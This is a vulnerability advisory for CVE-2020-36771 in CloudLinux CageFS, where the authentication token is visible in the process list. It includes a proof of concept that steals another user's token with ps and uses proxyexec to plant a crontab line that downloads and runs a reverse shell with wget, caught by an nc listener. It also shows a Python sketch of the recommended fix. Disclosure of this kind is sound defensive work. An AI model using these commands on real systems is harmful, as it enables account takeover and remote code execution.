# CloudLinux CageFS Token Disclosure #  
## Vulnerability Overview ##  
CloudLinux CageFS 7.1.1-1 or below passes the authentication token as a  
command line argument. In some configurations this allows local users to  
view the authentication token via the process list and gain code execution  
as another user.  
* **Identifier** : SBA-ADV-20200707-01  
* **Type of Vulnerability** : Invocation of Process Using Visible Sensitive Information  
* **Software/Product Name** : CloudLinux CageFS  
* **Vendor** : CloudLinux Inc.  
* **Affected Versions** : <= 7.1.1-1  
* **Fixed in Version** : 7.1.2-2  
* **CVE ID** : CVE-2020-36771  
* **CVSS Vector** : CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H  
* **CVSS Base Score** : 7.8 (High)  
## Vendor Description ##  
> CloudLinux OS is the leading platform for multitenancy. It improves  
> server stability, density, and security by isolating each tenant and  
> giving them allocated server resources. This creates an environment  
> that feels more like a virtual server than a shared hosting account.  
> By doing so, CloudLinux OS reduces operating costs and churn rates,  
> and increases profitability.  
Source: <>  
## Impact ##  
If the `lve_namespaces` service or the virtualized proc filesystem  
feature is disabled, a local user can obtain the CageFS authentication  
token of other users by exploiting the vulnerability documented in this  
advisory. In most configurations this allows attackers to gain code  
execution as those users.  
## Vulnerability Description ##  
CloudLinux offers a feature called proxy commands in CageFS environments.  
It allows limited execution of commands outside the CageFS environment from  
a user restricted within the CageFS environment.  
For this purpose a CageFS daemon runs outside of the CageFS environment;  
it is reachable via a UNIX socket from within the CageFS environment.  
The UNIX socket is handled by `proxyexec`. To make the whole process of  
calling a tool outside of CageFS transparent to the user, wrapper  
scripts are placed within CageFS, which in turn call `proxyexec` to  
execute the commands outside of the CageFS environment.  
Those wrapper scripts read the CageFS token from `/var/.cagefs/.cagefs.token`  
and pass it to the `proxyexec` command as a command line argument.  
CloudLinux by default enables the virtualized proc filesystem, which  
prevents other users from seeing the CageFS token within the process  
list. However, if the `lve_namespaces` service is disabled, e.g. the  
systemd unit is masked out, or the virtualized proc filesystem is  
explicitly disabled, other users can see the CageFS token within the  
process list. They can use the CageFS token of other users to talk to  
the CageFS daemon via `proxyexec` and the CageFS daemon executes the  
commands with the privileges of the supplied authentication token.  
## Proof of Concept ##  
Let's assume the `lve_namespaces` service is disabled and we are user  

```
$ id
uid=935(ftp2406151) gid=935(site2406151) groups=935(site2406151)
```

We inspect the process list and find another user executing `ping`:  

```
$ ps aux | grep proxyexec
2094 root 0:00 /usr/sbin/proxyexec -q -d -s /var/lib/proxyexec/cagefs.sock/socket /bin/cagefs.server
1180646 934 0:00 /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / PING 1180642
1180647 root 0:00 /usr/sbin/proxyexec -q -d -s /var/lib/proxyexec/cagefs.sock/socket /bin/cagefs.server
1181229 ftp24061 0:00 grep proxyexec
```

We can now execute commands as user `ftp1488781` and, for example, view  
the crontab:  

```
$ /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / CRONTAB_LIST 0
no crontab for ftp1488781
```

Now we set up a new crontab entry, which downloads a reverse shell and  
executes it every minute:  

```
$ echo '* * * * * wget -q -O rshell && chmod +x rshell && nohup ./rshell &' | /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / CRONTAB_SAVE 0
$ /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / CRONTAB_LIST 0
* * * * * wget -q -O rshell && chmod +x rshell && nohup ./rshell &
```

Our shell connects back to us and we can execute arbitrary commands as  
the other user:  

```
$ nc -l -p 1234
uid=934(ftp1488781) gid=934(site1488781) groups=934(site1488781)
```
## Recommended Countermeasures ##  
We recommend against passing sensitive information as a command line  
argument. Instead, `proxyexec` should read the CageFS token directly  
from the file `/var/.cagefs/.cagefs.token` and pass it to the CageFS  
daemon via the UNIX socket.  
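The following is an added illustration of the two designs contrasted in this advisory, not CloudLinux's code: the original wrapper shape, where the token is an argv element and therefore shows up in `/proc/<pid>/cmdline` whenever the proc filesystem is not virtualized, beside the recommended shape, where the wrapper reads the token from its owner-only file and hands it to the daemon over the UNIX socket. The wire format, user name, token value and function names are assumptions made for this example.

```python
"""Two ways a wrapper can hand a CageFS-style token to a proxy daemon: as an argv
element (readable via /proc/<pid>/cmdline, i.e. `ps aux`) or over an AF_UNIX socket
(seen only by the two endpoints). Names, wire format and token are constructed."""
import hmac
import os
import socket
import tempfile

def vulnerable_argv(user: str, token: str, cmd: str) -> list:
    """Shape of the original wrapper invocation: the token is an argv element."""
    return ["/usr/sbin/proxyexec", "-c", "cagefs.sock", user, token, "/", cmd, "0"]

def hardened_argv(user: str, cmd: str) -> list:
    """Proposed shape: argv carries only non-secret values."""
    return ["/usr/sbin/proxyexec", "-c", "cagefs.sock", user, "/", cmd, "0"]

def token_visible_in_argv(argv: list, token: str) -> bool:
    """Model of /proc/<pid>/cmdline (NUL-joined argv), readable by other users without proc virtualization."""
    return token.encode() in b"\0".join(a.encode() for a in argv)

def hardened_client(sock: socket.socket, token_path: str, user: str, cmd: str) -> None:
    """Hardened wrapper: read the token from its 0600 file and send it over the socket."""
    with open(token_path) as f:
        token = f.read().strip()
    sock.sendall(f"{user}\0{token}\0{cmd}\n".encode())  # constructed wire format

def hardened_server(sock: socket.socket, expected: dict) -> tuple:
    """Daemon side: run the command only if the token matches the named user's token."""
    user, token, cmd = sock.recv(4096).decode().rstrip("\n").split("\0")
    ok = hmac.compare_digest(expected.get(user, ""), token)  # constant-time compare
    return ok, user, cmd

def demo(tamper: bool = False) -> dict:
    """Exercise both paths; with tamper=True the daemon holds a different token."""
    token = "EXAMPLE-TOKEN-NOT-REAL"  # constructed, not a real CageFS token
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, ".cagefs.token")
        fd = os.open(path, os.O_WRONLY | os.O_CREAT, 0o600)  # owner-only, like a token file
        os.write(fd, token.encode())
        os.close(fd)
        a, b = socket.socketpair(socket.AF_UNIX)
        with a, b:
            hardened_client(a, path, "ftpuser", "CRONTAB_LIST")
            ok, user, cmd = hardened_server(b, {"ftpuser": "other" if tamper else token})
    return {
        "argv_leaks": token_visible_in_argv(vulnerable_argv("ftpuser", token, "CRONTAB_LIST"), token),
        "fixed_argv_leaks": token_visible_in_argv(hardened_argv("ftpuser", "CRONTAB_LIST"), token),
        "auth_ok": ok, "user": user, "cmd": cmd,
    }
```

Running `demo()` shows the token present in the vulnerable argv model and absent from the hardened one, while the socket path still authenticates the request (and rejects it when the daemon's token differs).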
## Timeline ##  
* `2020-07-07`: identification of vulnerability in version 7.0.6-1  
* `2020-07-10`: initial vendor contact  
* `2020-07-13`: initial vendor response  
* `2020-07-13`: disclosed vulnerability to vendor security contact  
* `2020-09-02`: vendor released version 7.1.2-2 to testing  
* `2020-09-28`: vendor released version 7.1.2-2 to production  
* `2020-10-02`: request CVE from MITRE  
* `2022-01-04`: MITRE declined the request as it falls in the scope of Red Hat  
* `2024-01-19`: request CVE from Red Hat  
* `2024-01-22`: Red Hat assigned CVE-2020-36771  
* `2024-01-25`: public disclosure  
## References ##  
* CloudLinux OS Documentation. Virtualized /proc filesystem: <>  
* CageFS 7.1.2-2 beta: <>  
* CageFS 7.1.2-2 production: <>  
## Credits ##  
* David Lisa Gnedt (SBA Research)